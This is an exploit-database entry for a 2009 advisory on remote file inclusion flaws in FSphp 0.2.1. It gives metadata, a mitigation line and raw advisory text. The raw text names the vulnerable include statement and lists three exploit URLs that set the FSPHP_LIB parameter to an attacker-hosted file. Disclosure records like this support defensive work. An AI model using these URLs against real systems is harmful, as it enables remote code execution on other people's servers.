header-logo
Suggest Exploit
vendor:
FSphp
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: FSphp
Affected Version From: 2000.2.1
Affected Version To: 2000.2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:fsphp:fsphp:0.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

FSphp 0.2.1 Multiple Remote File Inclusion Vulnerabilities

FSphp 0.2.1 is vulnerable to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by sending a malicious URL to the vulnerable application. The malicious URL contains the path of the malicious file which is hosted on a remote server. When the vulnerable application includes the malicious file, the attacker can execute arbitrary code on the vulnerable system.

Mitigation:

The application should use a whitelist of allowed files and should not include files from external sources.
Source

Exploit-DB raw data:

==============================================================================


  [o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerabilities

       Software : FSphp version 0.2.1
       Vendor   : http://fsphp.sourceforge.net/
       Download : http://sourceforge.net/projects/fsphp/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


==============================================================================


  [o] Vulnerable file

       include_once $FSPHP_LIB . "/path.php" ;

	 lib/FSphp.php
	 lib/navigation.php
	 lib/pathwirte.php


  [o] Exploit

       http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]
       http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]
       http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]


==============================================================================


  [o] Greetz

       Anti Security [ http://antisecurity.org ]
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe
       H312Y yooogy mousekill }^-^{ martfella noname s4va
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


  [o] Note

       SELAMAT HARI RAYA IDUL FITRI
       MOHON MAAF LAHIR BATIN


==============================================================================

# milw0rm.com [2009-09-18]